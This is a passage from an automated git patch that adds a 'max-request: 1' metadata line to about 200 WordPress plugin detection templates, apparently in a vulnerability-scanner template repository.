@@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:6aec6bf9d0e32f5e4a3a98c33524e2fd6d8ad9b0 +templates-checksum.txt:be84bfb22db78f7ab52ec26484a1440c71176808 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 33cf3273581d9f5255cad828f82116b539004491 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 04:55:19 +0000 Subject: [PATCH 442/609] TemplateMan Update [Fri Jul 7 04:55:19 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 